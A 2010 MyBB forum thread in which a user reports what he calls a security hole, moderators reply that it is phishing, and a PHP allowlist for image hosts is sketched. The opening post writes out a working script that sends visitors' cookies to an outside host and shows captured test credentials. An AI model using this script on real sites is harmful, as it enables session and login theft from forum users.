but to get your cookies I should post next:
<script>img = new Image(); img.src = 'http://fifastars.net84.net/scripts/2/loadbanner.php?cook='+document.cookie;</script>
in an HTML file and after this you must just access this HTML file
That looks like more of a phishing attempt where the site tries to spoof itself by saying it's asking for "MyBB anthentification" and getting unsuspecting users to enter their login details.
I know you can press cancel but a beginner will insert his password, believe me
look what I get by now, let's say this is a password :d
HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | ....... | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)
HAHAHAHAHAHAHAHAHAHAHAH (should be username)
jodifgjdojnfkfjdjfoijfv (password)
So this is not a MyBB security hole as you so blatantly put it. It's a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure you it will cause you to get banned wherever you use such a tactic!
(2010-11-16, 08:36 AM)- G33K - Wrote: [ -> ]So this is not a MyBB security hole as you so blatantly put it. It's a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure you it will cause you to get banned wherever you use such a tactic!
ok try to insert this script [img]link[/img] on premium uCoz websites and you will see that this is not working
+ here is a website that, when you try to insert an img, says:
Din motive de securitate, imaginile pentru tag-ul [img] se acceptă doar de pe site-urile din această listă, puteți să le încărați acolo. Apăsați butonul Înapoi, și edițați-vă mesajul.
Translate:
For security reasons, the images tag [img] shall be accepted only on sites in this list, you can get it loaded there. Click the Back button and edit your message.
website lists:
http://tinypic.com
http://imgur.com
http://imageshack.us
http://fastpic.ru
http://radikal.ru
http://immage.de
http://bayimg.com
maybe it's not a security hole, but it would be better if we try to avoid situations where our users give their passwords to hackers
You realise that any website that allows you to input images is 'vulnerable' to this...?? All you're doing is writing a malicious script and getting people to visit it to steal their information.
yes I realise this, but can you make it so that images are accepted only from some sites, not from all? just like in the above example
(2010-11-16, 10:10 AM)Evollution Wrote: [ -> ]yes I realise this, but can you make it so that images are accepted only from some sites, not from all? just like in the above example
You can request it as a plugin.
IMO, you can not have this as a core feature of MyBB because it would be too limiting and admins would have to muck around with the list of sites to allow/disallow.
Also, using this phishing attempt will not last long on any board with active moderators as they will immediately remove it and ban the user who posted it.
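The host allowlist for [img] tags requested in this thread could look like the sketch below. It is an added example, not part of the original posts and not MyBB or uCoz code: the function names are hypothetical, the host list is the one quoted above, and example.invalid is a placeholder host in the constructed sample post.

```php
<?php
// Hosts taken from the list quoted in the thread.
const ALLOWED_IMG_HOSTS = [
    'tinypic.com', 'imgur.com', 'imageshack.us', 'fastpic.ru',
    'radikal.ru', 'immage.de', 'bayimg.com',
];

// True only if $url is http(s), carries no userinfo, and its host is an
// allowed host or a dot-delimited subdomain of one.
function img_url_allowed(string $url): bool
{
    $parts = parse_url(trim($url));
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // Reject URLs such as http://imgur.com@other-host/ where the allowed
    // name is only the userinfo part, not the host that gets contacted.
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;
    }
    $host = rtrim(strtolower($parts['host']), '.');
    foreach (ALLOWED_IMG_HOSTS as $allowed) {
        $suffix = '.' . $allowed;
        // A plain "ends with imgur.com" test would also accept notimgur.com.
        if ($host === $allowed || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Returns every [img] URL in a post that fails the allowlist check.
function rejected_img_urls(string $message): array
{
    preg_match_all('~\[img[^\]]*\](.*?)\[/img\]~is', $message, $m);
    return array_values(array_filter($m[1], fn($u) => !img_url_allowed($u)));
}

// Constructed sample post: one allowed image and three that must be refused.
$post = "[img]http://imgur.com/a.png[/img] "
      . "[img]http://example.invalid/banner.php[/img] "
      . "[img]http://imgur.com@example.invalid/x.png[/img] "
      . "[img]http://imgur.com.example.invalid/x.png[/img]";
print_r(rejected_img_urls($post));
```

The check covers only the URL as posted, so it relies on the listed hosts not redirecting image requests elsewhere.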